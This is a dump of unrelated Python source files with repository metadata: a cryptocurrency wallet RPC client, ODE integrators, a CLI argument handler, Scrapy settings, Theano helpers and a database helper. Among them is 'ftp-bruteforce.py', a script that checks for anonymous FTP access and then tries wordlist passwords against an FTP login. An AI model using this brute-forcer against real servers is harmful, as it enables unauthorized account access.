mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Chilcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
| [
"o.guerrero.g@gmail.com"
] | o.guerrero.g@gmail.com |
de45b5fb59e4ed81160ae7c420e580b610fc00bc | 9124d33767414433ca2cad8e33aa47bd03d6f5c7 | /Python/PythonKurs 2015.04/double_pendulum-r25/ode.py | 562e09530b6c41530572b94a3e79b1a59c3da341 | [] | no_license | Sir2B/Uni | b05c9351c384fec8a397be36bce6f4bcff7b4276 | f54eee2d2c3af7a628d8058f913bb5ea51724f4a | refs/heads/master | 2020-05-22T01:13:55.752574 | 2020-03-15T11:48:36 | 2020-03-15T11:48:36 | 24,673,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,432 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
#------------------------------------------------------------------------------
# Module for solving ordinary differential equations (ODE).
#
# Author: Tino Wagner
# Creation: 03/2008
# Last Change: $Date: 2008-03-27 11:18:15 +0100 (Do, 27 Mär 2008) $
# by $Author: tino $
#------------------------------------------------------------------------------
import math
# Global configuration
QUIET = True # Should the integrators be quiet?
MAX_STEPS = 5000 # How many iterations?
class ODE(object):
"""Base class for ODE solvers."""
def __init__(self, rhs=None, x=None, t=0, atol=None, rtol=None,
min_dt=None):
"""Initializes the ODE using the given system."""
self._x = x
self._t = t
self.atol = atol
self.rtol = rtol
self.min_dt = min_dt
if rhs is None:
self._rhs = self.rhs
else:
self._rhs = rhs
def set_ode(self, rhs):
"""Set right hand side function of the system."""
self._rhs = rhs
def set_initial(self, x, t=0):
"""Set initial conditions."""
self._x = x
self._t = t
def rhs(self, x, t):
"""Default RHS.
x' = rhs(x, t)
"""
return []
def integrate(self, dt):
pass
class Euler(ODE):
"""Solves ODE using straight-forward Euler method."""
def __init__(self, rhs=None, x=None, t=0, atol=None, rtol=None,
min_dt=None, steps=20):
super(Euler, self).__init__(rhs, x, t, atol, rtol, min_dt)
self.steps = steps # number of integration steps between t and t + dt
def step(self, dt, x0=None, t0=None):
"""Do ODE integration step using Euler."""
t = self._t if t0 is None else t0
x = self._x if x0 is None else x0
n = len(x)
k1 = self._rhs(x, t) # the one and only step
x_temp = [x[i] + dt * k1[i] for i in xrange(0, n)]
return x_temp
def integrate(self, dt):
"""Integrate ODE."""
n_steps = self.steps
dt_i = dt/n_steps
for i in xrange(0, n_steps):
self._x = self.step(dt_i)
self._t += dt_i
return self._x
class RungeKutta(ODE):
"""Solves ODE using 4th order Runge-Kutta."""
def __init__(self, rhs=None, x=None, t=0, atol=None,
rtol=None, min_dt=None, steps=15):
super(RungeKutta, self).__init__(rhs, x, t, atol, rtol, min_dt)
self.steps = steps # number of integration steps between t and t + dt
def step(self, dt, x0=None, t0=None):
"""Do ODE integration step using Runge-Kutta."""
t = self._t if t0 is None else t0
x = self._x if x0 is None else x0
n = len(x)
k1 = self._rhs(x, t) # step 1
x_temp = [x[i] + dt * k1[i] / 2 for i in xrange(0, n)]
k2 = self._rhs(x_temp, t + dt/2) # step 2
x_temp = [x[i] + dt * k2[i] / 2 for i in xrange(0, n)]
k3 = self._rhs(x_temp, t + dt/2) # step 3
x_temp = [x[i] + dt * k3[i] for i in xrange(0, n)]
k4 = self._rhs(x_temp, t + dt) # step 4
x_temp = [x[i] + dt * (k1[i] + 2 * k2[i] + 2 * k3[i] + k4[i]) / 6 \
for i in xrange(0, n)]
return x_temp
def integrate(self, dt):
"""Integrate ODE."""
n_steps = self.steps
dt_i = dt/n_steps
for i in xrange(0, n_steps):
self._x = self.step(dt_i)
self._t += dt_i
return self._x
class DormandPrince(ODE):
"""Solves ODE using 5th order Dormand-Prince Runge-Kutta method."""
def __init__(self, rhs=None, x=None, t=0, atol=None, rtol=None,
min_dt=None):
super(DormandPrince, self).__init__(rhs, x, t, atol, rtol, min_dt)
def step(self, dt, x0 = None, t0 = None):
"""Do ODE integration step using Dormand-Prince Runge-Kutta method."""
# Dormand-Prince 5(4) parameters from "Numerical Recipes"
c2, c3, c4, c5 = (1./5, 3./10, 4./5, 8./9)
a21 = 1./5
a31, a32 = (3./40, 9./40)
a41, a42, a43 = (44./45, -56./15, 32./9)
a51, a52, a53, a54 = (19372./6561, -25360./2187, 64448./6561, \
-212./729)
a61, a62, a63, a64, a65 = (9017./3168, -355./33, 46732./5247, \
49./176, -5103./18656)
a71, a72, a73, a74, a75, a76 = (35./384, 0., 500./1113, 125./192, \
-2187./6784, 11./84)
# coefficients for 5th order system
b1, b2, b3, b4, b5, b6, b7 = (35./384, 0., 500./1113, 125./192, \
-2187./6784, 11./84, 0.)
# coefficients for reduced (4th order) system
b1r, b2r, b3r, b4r, b5r, b6r, b7r = (5179./57600, 0., 7571./16695, \
393./640, -92097./339200, 187./2100, 1./40)
t = self._t if t0 is None else t0
x = self._x if x0 is None else x0
n = len(x)
k1 = self._rhs(x, t) # step 1
x_temp = [x[i] + dt * a21 * k1[i] for i in xrange(0, n)]
k2 = self._rhs(x_temp, t + dt * c2) # step 2
x_temp = [x[i] + dt * (a31 * k1[i] + a32 * k2[i])
for i in xrange(0, n)]
k3 = self._rhs(x_temp, t + dt * c3) # step 3
x_temp = [x[i] + dt * (a41 * k1[i] + a42 * k2[i] + a43 * k3[i])
for i in xrange(0, n)]
k4 = self._rhs(x_temp, t + dt * c4) # step 4
x_temp = [x[i] + dt * \
(a51 * k1[i] + a52 * k2[i] + a53 * k3[i] + a54 * k4[i])
for i in xrange(0, n)]
k5 = self._rhs(x_temp, t + dt * c5) # step 5
x_temp = [x[i] + dt * \
(a61 * k1[i] + a62 * k2[i] + a63 * k3[i] + a64 * k4[i] + \
a65 * k5[i])
for i in xrange(0, n)]
k6 = self._rhs(x_temp, t + dt) # step 6
# 5th order solution
x_t = [x[i] + dt * \
(b1 * k1[i] + b2 * k2[i] + b3 * k3[i] + b4 * k4[i] + \
b5 * k5[i] + b6 * k6[i])
for i in xrange(0, n)]
# w/o error if not tolerances given
if self.atol is None and self.rtol is None:
return (x_t, None)
x_temp = [x[i] + dt * \
(a71 * k1[i] + a72 * k2[i] + a73 * k3[i] + a74 * k4[i] + \
a75 * k5[i] + a76 * k6[i])
for i in xrange(0, n)]
# step 7 - can be optimized! first same as last (p. 913)
k7 = self._rhs(x_temp, t + dt)
# 4th order solution
x_tr = [x[i] + dt * (b1r * k1[i] + b2r * k2[i] + b3r * k3[i] + \
b4r * k4[i] + b5r * k5[i] + b6r * k6[i] + \
b7r * k7[i])
for i in xrange(0, n)]
def norm(vec): # calculate error
return math.sqrt(sum([x**2 for x in vec]))
xx = x_t if norm(x_t) > norm(x) else x
# scale = atol + max(x_t, x) * rtol
scale = [self.atol + abs(self.rtol * x_i) for x_i in xx]
# delta = abs(x_t - x_tr) <= scale
delta = [abs(x_t[i] - x_tr[i]) for i in xrange(0, n)]
# err
err = math.sqrt(sum([(delta[i] / scale[i]) ** 2
for i in xrange(0, n)]) / n)
return (x_t, err)
def integrate(self, dt):
"""Controls ODE integration."""
# if no tolerances are given, only do the step dt
if self.atol is None and self.rtol is None:
(x, err) = self.step(dt)
self._x = x
self._t += dt
return self._x
h = dt # help step
target_t = self._t + dt # target time
step_cnt = 0
while step_cnt < MAX_STEPS:
step_cnt += 1
if (self._t + h) > target_t:
break # break if under target time
(x, err) = self.step(h)
if not QUIET:
print "New x calculated using h = %f." % h
if err < 1:
self._x = x
self._t += h
if not QUIET:
print "Integration error = %.2f < 1" % err
else:
# safety for calculation of new step width
safe = 0.9
h *= safe * math.pow(err, -0.2)
if not QUIET:
print "x dropped. New h: %f" % h
# remaining step
hh = target_t - self._t
# if remaining step > last h => use new h = min_step
if hh > h:
print "MAX_STEPS = %i used." % MAX_STEPS
if self.min_dt is not None:
print "Doing remaining steps using min_dt = %.2f" \
% self.min_dt
while (self._t+self.min_dt < target_t):
(x, err) = self.step(self.min_dt)
self._x = x
self._t += self.min_dt
# remaining step
hh = target_t - self._t
if not QUIET:
print "Last h: %f" % hh
(x, err) = self.step(hh)
self._x = x
self._t += hh
return self._x
# ODE solver using scipy's odeint
try:
from scipy.integrate import odeint
class ODEint(ODE):
def __init__(self, rhs=None, x=None, t=0, atol=None, rtol=None,
min_dt=None):
super(ODEint, self).__init__(rhs, x, t, atol, rtol, min_dt=None)
def integrate(self, dt):
"""Integrate ODE using Scipy solvers."""
self._x = odeint(self._rhs, self._x, [0, dt],
atol=self.atol, rtol=self.rtol)[-1]
self._t += dt
return self._x
except ImportError:
print "ODE: Scipy integrator not available."
# Set a default integrator.
DefaultIntegrator = DormandPrince
if __name__ == '__main__':
# solve sample ODE: x'' + x = 0
# => x' = u
# => u' = -x
def diff(x, t):
return [x[1], -x[0]]
atol = rtol = 1e-10
odes = [Euler(diff, [1.0, 0]), RungeKutta(diff, [1.0, 0]),
DormandPrince(diff, [1.0, 0], atol=atol, rtol=rtol)]
try:
odes += [ODEint(diff, [1.0, 0], atol = atol, rtol = rtol)]
except:
print "Skipping ODEint test."
for ode in odes:
print repr(ode)
print "cos(pi): %.10f" % ode.integrate(math.pi)[0]
| [
"tobias.obermayer@physik.uni-muenchen.de"
] | tobias.obermayer@physik.uni-muenchen.de |
e4acf74c554fac23a419ae26acc59ce0e94523a9 | 32ac9eb927646e5428020a0943ed79b6051c4d0a | /darkflow/defaults.py | 6866f48860186e8dbb7b9eadc9fad9fde98fd3b6 | [] | no_license | dun933/MisconductDetectionofTrucker | c09a7554d3042a9560a994950a0471c33668dc8d | e224c0f7bddffb068d3cfc6fe3b4f2769c49e5d3 | refs/heads/master | 2020-11-26T18:33:29.935330 | 2019-09-24T01:43:43 | 2019-09-24T02:19:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,183 | py | class argHandler(dict):
#A super duper fancy custom made CLI argument handler!!
__getattr__ = dict.get
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
_descriptions = {'help, --h, -h': 'show this super helpful message and exit'}
def setDefaults(self):
self.define('imgdir', './sample_img/', 'path to testing directory with images')
self.define('binary', './bin/', 'path to .weights directory')
self.define('config', './cfg/', 'path to .cfg directory')
self.define('dataset', '../pascal/VOCdevkit/IMG/', 'path to dataset directory')
self.define('labels', 'labels.txt', 'path to labels file')
self.define('backup', './ckpt/', 'path to backup folder')
self.define('summary', '', 'path to TensorBoard summaries directory')
self.define('annotation', '../pascal/VOCdevkit/ANN/', 'path to annotation directory')
self.define('threshold', -0.1, 'detection threshold')
self.define('model', '', 'configuration of choice')
self.define('trainer', 'rmsprop', 'training algorithm')
self.define('momentum', 0.0, 'applicable for rmsprop and momentum optimizers')
self.define('verbalise', True, 'say out loud while building graph')
self.define('train', False, 'train the whole net')
self.define('load', '', 'how to initialize the net? Either from .weights or a checkpoint, or even from scratch')
self.define('savepb', False, 'save net and weight to a .pb file')
self.define('gpu', 0.0, 'how much gpu (from 0.0 to 1.0)')
self.define('gpuName', '/gpu:0', 'GPU device name')
self.define('lr', 1e-5, 'learning rate')
self.define('keep',20,'Number of most recent training results to save')
self.define('batch', 4, 'batch size')
self.define('epoch', 1500, 'number of epoch')
self.define('save', 2000, 'save checkpoint every ? training examples')
self.define('demo', '', 'demo on webcam')
self.define('queue', 1, 'process demo in batch')
self.define('json', False, 'Outputs bounding box information in json format.')
self.define('saveVideo', False, 'Records video from input video or camera')
self.define('pbLoad', '', 'path to .pb protobuf file (metaLoad must also be specified)')
self.define('metaLoad', '', 'path to .meta file generated during --savepb that corresponds to .pb file')
def define(self, argName, default, description):
self[argName] = default
self._descriptions[argName] = description
def help(self):
print('Example usage: flow --imgdir sample_img/ --model cfg/yolo.cfg --load bin/yolo.weights')
print('')
print('Arguments:')
spacing = max([len(i) for i in self._descriptions.keys()]) + 2
for item in self._descriptions:
currentSpacing = spacing - len(item)
print(' --' + item + (' ' * currentSpacing) + self._descriptions[item])
print('')
exit()
def parseArgs(self, args):
print('')
i = 1
while i < len(args):
if args[i] == '-h' or args[i] == '--h' or args[i] == '--help':
self.help() #Time for some self help! :)
if len(args[i]) < 2:
print('ERROR - Invalid argument: ' + args[i])
print('Try running flow --help')
exit()
argumentName = args[i][2:]
if isinstance(self.get(argumentName), bool):
if not (i + 1) >= len(args) and (args[i + 1].lower() != 'false' and args[i + 1].lower() != 'true') and not args[i + 1].startswith('--'):
print('ERROR - Expected boolean value (or no value) following argument: ' + args[i])
print('Try running flow --help')
exit()
elif not (i + 1) >= len(args) and (args[i + 1].lower() == 'false' or args[i + 1].lower() == 'true'):
self[argumentName] = (args[i + 1].lower() == 'true')
i += 1
else:
self[argumentName] = True
elif args[i].startswith('--') and not (i + 1) >= len(args) and not args[i + 1].startswith('--') and argumentName in self:
if isinstance(self[argumentName], float):
try:
args[i + 1] = float(args[i + 1])
except:
print('ERROR - Expected float for argument: ' + args[i])
print('Try running flow --help')
exit()
elif isinstance(self[argumentName], int):
try:
args[i + 1] = int(args[i + 1])
except:
print('ERROR - Expected int for argument: ' + args[i])
print('Try running flow --help')
exit()
self[argumentName] = args[i + 1]
i += 1
else:
print('ERROR - Invalid argument: ' + args[i])
print('Try running flow --help')
exit()
i += 1
| [
"iamyugachang@gmail.com"
] | iamyugachang@gmail.com |
cf2edc8f1e4119ea0fc089508c5b8179a8bfb65e | 893bb8d726e48ac471ce963feab8844561d7fb31 | /src/views.py | d88955358e7d7d83c61b5df8d147e9d773b38171 | [] | no_license | tadtenacious/nrd_db_proj | 92262bff89e1460233d41fb1278e2365fa265c41 | ce9281242beabaf955f2e85fb1692c334199ed9f | refs/heads/master | 2020-06-08T15:42:13.966248 | 2020-01-17T01:28:07 | 2020-01-17T01:28:07 | 193,255,193 | 0 | 1 | null | 2020-01-12T21:40:08 | 2019-06-22T16:25:23 | Python | UTF-8 | Python | false | false | 429 | py | import psycopg2
from .db import reader
def make_views(con, cursor):
views = reader('sql/create_views.sql')
print('Creating views. This will take a while.')
try:
cursor.execute(views)
con.commit()
print('Views created successfully.')
except (psycopg2.OperationalError, psycopg2.ProgrammingError) as e:
print('An error occured.')
print(e)
con.rollback()
return
| [
"tadworkswith@gmail.com"
] | tadworkswith@gmail.com |
f51a2ebb6f85f0f5d06ee9ac9dd3373d5880f1d0 | d17724b2ce056b435f57b16fb0cbea32e44a29c6 | /Gun4PY/ftp-bruteforce.py | 0f673dce18e4b54b0c7f64d8571451b8a5f6f497 | [] | no_license | UgurCIL/Examples | 27264d89131b4aaff46f91705a03779c4e825ad6 | c1722a519836a24c8a946380e6cbcd6da963f0c5 | refs/heads/master | 2020-04-24T15:28:17.288204 | 2019-02-22T13:30:35 | 2019-02-22T13:30:35 | 172,069,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,018 | py | import sys
from ftplib import FTP
def checkAnonymous(dstIP):
try:
ftp = FTP(dstIP)
ftp.login()
print "[*] Anonymous giris acik"
print "[*] Kullanici Adi : anonymous"
print "[*] Parola : anonymous"
ftp.close()
except:
pass
def ftpLogin(dstIP, user, passw):
try:
ftp = FTP(dstIP)
ftp.login(user, passw)
ftp.quit()
print "[!] Kullanici/Parola bulundu."
print "[!] Kullanici Adi : " + user
print "[!] Parola : " + passw
sys.exit(0)
except:
pass
def bruteForce(dstIP, user, wordL):
try:
wordlist = open(wordL, "r")
words = wordlist.readlines()
for word in words:
word = word.strip()
ftpLogin(dstIP, user, word)
except:
print "[-] Eslesen parola bulunamadi.."
sys.exit(0)
dstIP = raw_input("FTP sunucu adresi : ")
user = raw_input("Kullanici adi : ")
wordlist = raw_input("Parola listesi : ")
bruteForce(dstIP, user, wordlist)
checkAnonymous(dstIP)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
c1832532d3861a28db187f5e643e52e7b47cdba6 | 395fe73bfc31cace2cfb3e83d28c1b3a3bbed0c1 | /spider_jd/spider_jd/settings.py | 92173872ae373b5e9b32821cb51e90722b842d28 | [] | no_license | Tobyxly/web_crawler | 0f9945c513cd945296974cd907dcfc1b8ab84166 | f5ffab9737cb6c02bf872809ed14665d7621c6bd | refs/heads/master | 2021-05-02T01:53:20.538031 | 2018-02-09T08:02:45 | 2018-02-09T08:02:45 | 120,875,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,122 | py | # -*- coding: utf-8 -*-
# Scrapy settings for spider_jd project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'spider_jd'
SPIDER_MODULES = ['spider_jd.spiders']
NEWSPIDER_MODULE = 'spider_jd.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'spider_jd (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'spider_jd.middlewares.SpiderJdSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'spider_jd.middlewares.SpiderJdDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'spider_jd.pipelines.SpiderJdPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
#LOG_LEVEL = 'DEBUG'
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"lyxiong@mobvoi.com"
] | lyxiong@mobvoi.com |
1b31f7c605bdd9ce3eea12c14e8665f08b7c8b6f | 50466b1d85816f34b83afe3714c27ee25f9276ad | /Tensorflow new1/seq2seq/1/ipython-notebooks-master/utils/__init__.py | a90a5d4e44f65bd719c35f0ac8e728ed648c7db2 | [] | no_license | codingMJ/selected-tutorials-Deep-Learning | b8416f911d55b3802f5b5f74bdfd810507953010 | 61b7d40f6e0b9ff9ecd1f41c6b69cb2e71646fad | refs/heads/master | 2021-09-07T17:31:47.597249 | 2018-02-26T22:29:47 | 2018-02-26T22:29:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,700 | py |
from collections import OrderedDict
import logging
import numpy as np
import theano
from theano import tensor as T
floatX = theano.config.floatX
def init_uniform(range=0.1, dtype=floatX):
return lambda shape: np.random.uniform(-range, range, size=shape).astype(dtype)
def init_normal(stdev=0.1, dtype=floatX):
return lambda shape: np.random.normal(0.0, stdev, shape).astype(dtype)
def init_zeros(dtype=floatX):
return lambda shape: np.zeros(shape, dtype=dtype)
class VariableStore(object):
def __init__(self, prefix="vs", default_initializer=init_uniform()):
self.prefix = prefix
self.default_initializer = default_initializer
self.vars = {}
@classmethod
def snapshot(cls, other, name=None):
"""
Create a new `VariableStore` by taking a snapshot of another `VariableStore`.
All variables in the other store will be cloned and put into a new instance.
"""
name = name or "%s_snapshot" % other.prefix
vs = cls(name)
for param_name, param_var in other.vars.iteritems():
vs.vars[param_name] = theano.shared(param_var.get_value(),
borrow=False)
return vs
def add_param(self, name, shape, initializer=None):
if initializer is None:
initializer = self.default_initializer
if name not in self.vars:
full_name = "%s/%s" % (self.prefix, name)
logging.debug("Created variable %s", full_name)
self.vars[name] = theano.shared(initializer(shape),
name=full_name)
return self.vars[name]
def Linear(inp, inp_dim, outp_dim, vs, name="linear", bias=True):
w = vs.add_param("%s/w" % name, (inp_dim, outp_dim))
ret = inp.dot(w)
if bias:
b = vs.add_param("%s/b" % name, (outp_dim,), initializer=init_zeros())
ret += b
return ret
def SGD(cost, params, lr=0.01):
grads = T.grad(cost, params)
new_values = OrderedDict()
for param, grad in zip(params, grads):
new_values[param] = param - lr * grad
return new_values
def momentum(cost, params, lr=0.01, momentum=0.9):
grads = T.grad(cost, params)
new_values = OrderedDict()
for param, grad in zip(params, grads):
param_val = param.get_value(borrow=True)
# momentum value
m = theano.shared(np.zeros(param_val.shape, dtype=param_val.dtype))
# compute velocity
v = momentum * m + lr * grad
new_values[m] = v
new_values[param] = param - v
return new_values | [
"altay.amanbay@ip-192-168-5-166.ec2.internal"
] | altay.amanbay@ip-192-168-5-166.ec2.internal |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.